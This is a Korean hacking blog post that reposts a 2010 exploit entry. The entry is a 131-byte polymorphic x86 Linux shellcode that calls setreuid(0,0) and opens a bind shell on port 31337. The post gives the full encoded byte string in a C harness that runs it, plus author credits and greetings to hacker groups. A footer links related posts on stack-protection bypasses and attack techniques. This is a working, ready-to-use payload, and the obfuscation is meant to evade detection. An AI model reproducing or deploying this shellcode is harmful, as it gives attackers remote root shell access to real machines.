Title : Polymorphic shellcode that bindport to 31337 with setreuid (0,0) x86 linux shellcode. |
Name : 131 bytes bind port 31337 x86 linux polymorphic shellcode. |
Date : Sat Jun 17 21:27:03 2010 |
Author : gunslinger_ <yudha.gunslinger[at]gmail.com> |
Web : http://devilzc0de.org |
blog : http://gunslingerc0de.wordpress.com |
tested on : linux debian |
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com) |
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! |
*/ |
#include <stdio.h> |
char bindport[] = "\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9\x01" |
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02\xb5" |
"\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8" |
"\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16\x9f" |
"\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16" |
"\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b" |
"\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5" |
"\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e" |
"\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5" ; |
int main( void ) |
{ |
fprintf (stdout, "Length: %d\n" , strlen (bindport)); |
(*( void (*)()) bindport)(); |
} |
'System_Hacking' 카테고리의 다른 글
gcc 컴파일 옵션, 스택실행,까나리 없애기,바운더리없애기, 랜덤스택 풀기 (0) | 2012.06.16 |
---|---|
GDB 사용법 (Usage GDB) (0) | 2012.05.06 |
FAKE EBP 공격 기법 (LOB level 16) (About attack of FAKE EBP) (0) | 2012.04.17 |
SPO 공격 기법에 대하여(LOB level12) (About attack of SPO) (0) | 2012.04.17 |
내가낸 HUST 해킹대회 K번 문제 풀이법 (2) | 2012.04.01 |